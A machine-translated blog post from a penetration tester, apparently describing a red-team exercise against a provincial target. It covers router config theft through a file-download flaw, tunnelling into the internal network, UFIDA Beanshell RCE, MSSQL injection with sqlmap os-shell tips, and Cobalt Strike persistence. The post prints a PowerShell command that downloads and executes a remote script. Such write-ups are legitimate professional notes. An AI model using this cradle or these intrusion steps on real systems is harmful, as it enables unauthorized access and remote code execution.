SongShuA

SongShuA

胸中梦黄粱,手握自在心 一个充满想法的网络安全从业人员 A person with dreams in their heart and the ability to control their own destiny, who is a creative professional in the field of cybersecurity.
github
HomeArchives

Notes on HW in a certain province and city

#hw#tips556
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The person encountered a router login interface while collecting information on a target network segment. They found a vulnerability that allowed them to download the router's configuration file and obtain the account password. They also discovered a tunnel proxy function in the router's console. They encountered a Beanshell RCE vulnerability in the target enterprise's OA system and used it to execute commands. They faced issues with the shell session timing out and found a workaround using PowerShell to download and execute commands. They also encountered an MSSQL injection vulnerability but couldn't exploit it further due to website and database separation. They faced challenges with PowerShell encoding and had to find a script to convert the encoding. They discovered a virtual machine in the target network segment but couldn't explore it further due to the difficulty of escaping the virtual machine. They found information about a ROS server but couldn't determine its purpose. They suggest leaving the exploration of the IDC architecture for later if there is enough time.

A while ago, I did a small homework assignment and encountered some things, so I made a note of it.

a882505938e4339ae2bd0ca96eb2ec3

1. Router Security#

When collecting information while casting a wide net, I discovered a router login page in the target network segment.

Snipaste_2022-07-14_23-58-36

This type of router version is generally used for home use and is rarely used by businesses. However, this network segment is a commercial network segment and is unlikely to have residential users. Therefore, it is speculated that this may be something accidentally exposed due to improper operation. So I searched the local vulnerability database and found an arbitrary file download. I downloaded its configuration file and obtained the account password.

Snipaste_2022-07-15_00-04-10
After entering the console, I found that there is a tunnel proxy function.

Snipaste_2022-07-15_00-08-44
After fiddling around for a while, I finally figured out how to use this thing. Just configure the client connection. The server is used to connect multiple routers of the same brand. IPSec is an encryption method, but it can also be used without it.

Finally, I was able to connect successfully in a probabilistic manner using pptp and the Win7 system. Win11 and Mac cannot connect properly (Kali also has issues). After the connection is established, it is equivalent to entering the target's internal network, and the subsequent steps are not mentioned...

2. UFIDA Bash#

1. Beanshell Exploitation#

In the target network segment, I discovered that the target enterprise's OA system is UFIDA and there is a Beanshell RCE vulnerability.

Snipaste_2022-07-15_00-17-08
However, at the beginning, I found that the default Beanshell directory page exists, but I couldn't execute any commands. So I investigated the specific analysis of this vulnerability and found that it also exists in other directories (modules). So I ran a dictionary attack on the paths and selected the best quality one for further operations. Dictionary Link

2. Unexpected Disconnection#

After successfully accessing the bs RCE page, I performed a shell rebound operation. Because the current shell is non-interactive, many operations are limited, and there are various problems with the environment inside the machine. In the end, I could only choose to use PowerShell to go online with CS. Here, another problem arose. Every time I executed the payload generated by CS, it would prompt for a successful connection, but if it exceeded 60 seconds, it would still disconnect.

This is because the default session timeout for CS is 60 seconds without a heartbeat, it will be considered as session termination. So why would a good session be terminated? Essentially, the "carrier" we use to execute commands is a web service. Web sessions are not persistent, and the web page session ends as soon as the webpage finishes loading. Our shell rebound operation also relies on the web, so when the web shell execution is completed (web page execution is completed), the session is terminated, the process is destroyed, and naturally, the CS session is disconnected. However, CS sleep 60s can easily make people mistakenly think that the session is alive for 60s.
The final solution: still using PowerShell, but modifying the logic this time. Change to download and execute the command.

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://xxx.com/shell')"

Now the program logic is: first download, then start another PowerShell to execute the content.

When the web session ends, the system will only destroy the download process. The separately started process will still remain, and the CS session will remain alive.

3. MSSQL Injection without Website Database Separation#

There is an MSSQL SQLi vulnerability in a certain feature of the target public account.

Sqlmap successfully exploited it and gained OS shell. However, when trying to rebound the shell, it was found that it couldn't reach the internet, and DNS didn't work either. I thought about writing a webshell proxy for subsequent operations, but I couldn't find the corresponding directory throughout the system. It is speculated that the website and database are separated, so the plan to write a webshell failed.
Sqlmap os-shell tricks

1. If you encounter a directory with spaces, you can use double quotes to wrap it, for example, cd "C:\Program Files". Some directories have a dir command, but cd says it doesn't exist. This may be because there are spaces in the directory.

2. When encountering a directory with Chinese characters, sqlmap may not be able to cd into it because the default encoding of sqlmap and Windows cmd is different. Sqlmap uses UTF-8 while the target cmd uses GBK. In this case, you can intercept and modify the encoding through packet capture. (However, it's too troublesome.)

3. When writing a large amount of content using os-shell in Windows, the content in the clipboard needs to be rendered character by character in your own terminal window, which is extremely time-consuming and consumes a lot of system resources. I chose to use a super injection tool with a GUI interface for writing, which saves a lot of time and resources (although it will cause lag, it's much better than the terminal window).

4. When using commands like echo to output content and write files, there is an 8K limitation. Only 8K of data can be written at a time. Most tools on the market are affected by this.

Since the website and database are separated and it doesn't reach the internet, I haven't encountered this situation before. So I asked my good friend @海鸥 i for advice. The expert recommended that I read his articles:

Exploration of Exe Landing Method for Non-Internet Website Database Separation - MSSQL

Exploration of Exe Landing Method for Non-Internet Website Database Separation - MySQL

A Record of Non-Echo Non-Internet Website Database Separation

Using one of the methods mentioned above to write something like fscan, and then output all the results to a text file, and then obtain the information by reading the text file. Keep doing this until you reach a host that reaches the internet. Finally, I decided to use Bcp to write files, but because it involves the database and I consider the operation sensitive and time-consuming, I gave up on further targeting this.

4. PowerShell Encoding#

When using PowerShell for execution in a certain target, I found that quotes, slashes, and similar characters would affect the normal operation of the program, resulting in transmission failure. So I wanted to encode it in base64 and then decode it. This is how the PowerShell command in CS works. So I randomly used a tool for encoding, but then I found that the shell command couldn't run properly. After researching, I learned that PowerShell's base64 is slightly different from the base64 we usually use and cannot be directly used interchangeably. So I found a conversion script on GitHub to solve the problem.

Script Link

5. Target Virtual Machine - Network Architecture#

In the target network segment, there is an IDC homepage. After taking down the official website, I found that this machine does not have an internal IP address, and the gateway is also a public IP address. Pinging the 172/192 range did not find any live hosts, and after disabling ping detection, I finally found a few 192 machines, but only ports 25/110 were open, which is very abnormal.

Based on the advice of other experts, it may be a virtual machine. So I expanded the scope of the internal network segment detection and found multiple 10 segments, but all the live hosts were routers. If I continue to dig deeper, it may only be possible to escape from the virtual machine, but the difficulty is too high and it consumes time.

I went back to look at the official website system and found the account passwords and IPs of the database server, Redis server, and ROS server in the configuration file, but the database and Redis have access whitelists, and only the ROS server can access them. However, I didn't know what this so-called ROS server was. So I searched on Baidu and finally found out that it is a router, and I found a connection tool Link

winboc-zh4

When connected, it looks like this, and it doesn't have much value. Summary: If you have a lot of time, it is recommended to set aside such an IDC architecture and deal with it later.

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.